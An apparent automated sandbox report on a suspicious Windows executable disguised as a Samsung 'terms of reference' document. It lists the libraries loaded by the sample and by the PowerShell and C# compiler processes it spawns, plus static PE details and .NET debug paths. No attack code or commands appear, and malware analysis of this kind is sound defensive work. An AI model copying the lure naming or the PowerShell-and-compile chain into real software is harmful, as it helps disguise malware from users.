Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: icu.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: wshunix.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic file information: File size 38551524 > 1048576
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x61a800
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17c600
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x157c00
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168130282.000002980C590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168102003.000002980C581000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256I source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160601511.00000298087F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164868495.000002980BA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164131315.000002980B850000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164058288.000002980B831000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167376562.000002980C121000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159402983.0000025773960000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159341485.0000025773951000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163977952.000002980B810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163418543.000002980B6F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167936851.000002980C4B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159001590.0000025772101000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164385610.000002980B931000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165666377.000002980BB01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165504033.000002980BAE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160451868.0000029808721000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160394554.00000298086E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168774305.000002980CA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188522957.00007FF6A81B8000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164662084.000002980BA00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164131315.000002980B850000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164058288.000002980B831000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp
